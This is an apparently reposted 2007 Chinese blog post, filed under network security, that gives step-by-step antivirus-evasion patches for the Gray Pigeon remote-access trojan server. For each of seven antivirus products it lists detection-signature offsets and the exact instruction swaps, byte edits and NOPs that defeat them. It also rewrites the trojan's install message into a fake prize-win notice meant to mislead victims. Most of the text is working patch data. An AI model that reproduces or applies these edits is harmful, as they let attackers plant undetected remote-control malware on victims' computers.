用户ID: 密码: 验证:

登 录

 注 册 取回密码

中山教育

中山国际网

中国教育在线
时代财富科技公司 FortuneAge Technology Co., Ltd. 校园博客客服网站(新)

我的资料
midpoint

博客信息

积分:2028
等级:4级 lv 4
日志总数:479
发表评论总数:24 ( 查看)
获得评论总数:39
发表留言总数:0
所属学校:三鑫
收藏本站:

最新公告

最新相册

我的日历

最新评论

写的不错嘛!
好资料啊。
马老师,你那里有没有07年中考英语口语考试真题5-9套的密...
很棒的功能,值得一试!
我n年前有这个想法
--Admin

最新留言

[全部留言] [发表留言]
SOGO学术论文网(http://www.sogoart....
马老师,你的博客,两个字,很好,我,一个字,顶!我常上你这...
中 国 教 育 学 会 函 件 ...
马老师,您好! 您的博客内容很丰富、知识性也很...
--书宏
马老师,谢谢您关于电脑学习的推荐!望不吝指教噢

RSS


首页 -> 网络安全->免杀手记为过7种杀毒软件(文件和内存 专杀)
2007-07-15
免杀手记为过7种杀毒软件(文件和内存 专杀)

文章转载自:http://

免杀手记为过7种杀毒软件(文件和内存 专杀)
CServer.dat
AVG
------------------------------------------------
特征码 物理地址/物理长度 如下:
[特征] 0007CD49_00000001 0047D949 0047332D
[特征] 00096F4A_00000001 00497B4A
[特征] 0009748D_00000001 0049808D
[特征] 0009B679_00000001 0049C279
[特征] 0009B9C3_00000001 0049C5C3
一处,修改CALL地址,将其下移并修改CALL地址.
二处,JNZ修改为JZ
三处,特征码上方,黑客动画吧00改变01
四处,16进制5A改为5C
五处,特征码上方JNZ改为JZ

CServer.dat 咖啡
------------------------------------------------
特征码 物理地址/物理长度 如下:
[特征] 000A158A_00000001 004A218A
[特征] 000B287A_00000001 004B9C7A
一处修改大小写
二处移位加换名
MAINICON 000552B0 00455EB0 B0 5E 45 00
Symantec
000552B2 00455EB2 B2 5E 45 00


CServer.dat 诺顿
------------------------------------------------
特征码 物理地址/物理长度 如下:
[特征] 00069416_00000001 0046A016
[特征] 000A15DF_00000001 004A21DF
[特征] 000B9A4F_00000001 004C0E4F
一处
16进制46改为45
二处修改:
提示
灰鸽子远程控制服务端安装成功
改为
恭喜
你成为本站的首位幸运中奖用户
三处
特征码上方小循环处的SBB改为SUB
服务端特征
------------------------------------------------
特征码 物理地址/物理长度 如下:
[特征] 000B28D2_00000001 hacker
0009C0B8 0049CCB8 B8 CC 49 00
移至
0009C0B9 0049CCB9 B9 CC 49 00
修改方法,移位.
CServer.dat卡巴
------------------------------------------------
特征码 物理地址/物理长度 如下:
[特征] 000A0933_00000001 004A1533
[特征] 000A0A00_00000001 004A1600
[特征] 000A0B27_00000001 004A1727
[特征] 000A0E49_00000001 004A1A49
[特征] 000A1301_00000001 004A1F01
[特征] 000A14F4_00000001 004A20F4
[特征] 000A1521_00000001 004A2121
一二处修改方法一样,两处CALL地址换位.
004A152E |. E8 3921F6FF CALL 0040366C
004A1533 |. E8 9413F6FF CALL 004028CC
三处修改ADD改SUB
四处
004A1A0E 5D POP EBP
改为
004A1A0E > 55 PUSH EBP
五处
B7改为B6
六处
汇编1改为2
七处下面4行代码换位.
004A210F . 8B15 C8584A00 MOV EDX,DWORD PTR DS:[4A58C8] ; CServer.004A7F30
004A2115 . 8902 MOV DWORD PTR DS:[EDX],EAX
004A2117 . A1 C8584A00 MOV EAX,DWORD PTR DS:[4A58C8]
004A211C . C740 04 34194>MOV DWORD PTR DS:[EAX+4],004A1934

服务端
------------------------------------------------
特征码 物理地址/物理长度 如下:
[特征] 000A14F4_00000001 004A20F4
[特征] 000A1519_00000001 004A2119
一处,两行代码换位.
004A20F2 C605 647F4A00>MOV BYTE PTR DS:[4A7F64],2
004A20F9 A1 FC584A00 MOV EAX,DWORD PTR DS:[4A58FC]
二处
将下面相同代码NOP掉后,将上面代码下移.

CServer.dat江民
------------------------------------------------
特征码 物理地址/物理长度 如下:
[特征] 0009F6C7_00000001 004A02C7
[特征] 000A12F4_00000001 004A1EF4
一处修改,两处CALL换位.
004A02BB . E8 9C4BF6FF CALL 00404E5C
004A02C0 . 50 PUSH EAX
004A02C1 . E8 4E6CF6FF CALL 00406F14

二处修改,调换顺序.
004A1EE7 . 68 78214A00 PUSH 004A2178 ; /Arg3 = 004A2178 ASCII "Hacker.com.cn_mutex"
004A1EEC . 6A FF PUSH -1 ; |Arg2 = FFFFFFFF
004A1EEE . 6A 00 PUSH 0 ; |Arg1 = 00000000

CServer.dat金山文件
------------------------------------------------
特征码 物理地址/物理长度 如下:
[特征] 000A0AF7_00000001 004A16F7
[特征] 000A125E_00000001 004A1E5E
一处修改大小写
二处,特征码上方两行花指令换位.

Server.exe文件
------------------------------------------------
特征码 物理地址/物理长度 如下:
[特征] 000B9DEF_00000001

CServer.dat金山内存
------------------------------------------------
特征码 物理地址/物理长度 如下:
[特征] 0005FCA3_00000001 004608A3
[特征] 0005FDEB_00000001 004609EB
[特征] 0009F553_00000001 004A0153
[特征] 000A0B83_00000001 004A1783

一处修改,两行代码换位.
0046089E |. 894D F8 MOV DWORD PTR SS:[EBP-8],ECX
004608A1 |. 8955 FC MOV DWORD PTR SS:[EBP-4],EDX
二处修改
无效的缓冲区
改为
虚拟内存过低

三处,修改计算机名称: 后移两位.
四处,特征码处字符,后移.
金山数据流修改
DESCRIPTION
Macromediae
DVCLAL
McAfee

PACKAGEINFO
KasperskyLa
TMAINFORMVER2
INTERNATIONAL
瑞星内存特征码修改请参阅JKS男人所做甲壳虫大型免杀教程第五课 :实战修改黑防鸽子过瑞星内存特征码
CServer.dat瑞星文件
------------------------------------------------
特征码 物理地址/物理长度 如下:
[特征] 00094B3E_00000001 0049573E
[特征] 000973EA_00000001 00497FEA
[特征] 0009AB3C_00000001 0049B73C
[特征] 0009CBBC_00000001 0049D7BC
[特征] 0009F5A7_00000001 004A01A7
[特征] 000A0A46_00000001 004A1646
[特征] 000A0DB8_00000001 004A19B8
[特征] 000A0DBF_00000001 004A19BF
[特征] 000A12A2_00000001 004A1EA2
[特征] 000A12A8_00000001 004A1EA8
[特征] 000A14C3_00000001 004A20C3
一处修改
特征码处CMP改为SUB
二处修改
特征码NOP掉后空一格汇编.
三处修改
特征码NOP掉后,空一格汇编
四处修改
特征及上面两行代码黑客动画吧NOP后空一格再黑客动画吧粘贴.
五处修改
特征码NOP后空一格汇编.
六处修改
004A1644 6A 00 PUSH 0
004A1646 6A 00 PUSH 0
004A1648 6A 40 PUSH 40
004A164A 6A 00 PUSH 0
004A164C 6A 00 PUSH 0
004A164E 6A 00 PUSH 0
改为
004A1644 |. 50 PUSH EAX
004A1645 |. 6A 00 PUSH 0
004A1647 |. 6A 00 PUSH 0
004A1649 |. 6A 40 PUSH 40
004A164B |. 6A 00 PUSH 0
004A164D |. 6A 00 PUSH 0
004A164F |. 50 PUSH EAX

七处修改
将CALL地址的代码换位,CALL地址改成新地址.
八处修改
004A19BC 50 PUSH EAX
004A19BD 6A 00 PUSH 0
004A19BF 6A 00 PUSH 0
改为
004A19BC |. 6A 00 PUSH 0
004A19BE |. 6A 00 PUSH 0
004A19C0 |. 50 PUSH EAX
九处修改
85 C0 0F 94
0F 94 CO 85
十处修改
004A1EA7 /74 11 JE SHORT CServer.004A1EBA
004A1EA9 |C605 647F4A00>MOV BYTE PTR DS:[4A7F64],0
以上两行代码换位.
十一处修改
68 BC 21 4A
68 BC 20 4A
瑞星内存特征码修改请参阅JKS男人所做甲壳虫大型免杀教程第五课 :实战修改黑防鸽子过瑞星内存特征码
By:马军  Posted @2007-7-15 21:38:00 阅读次数 (418) 评论 (0)

网友评论

共 0 页,0 条记录  

用户名:
密码:
您的评论:
正在载入编辑器...
请输入验证码:


发 表 评 论

马军-中山教师家园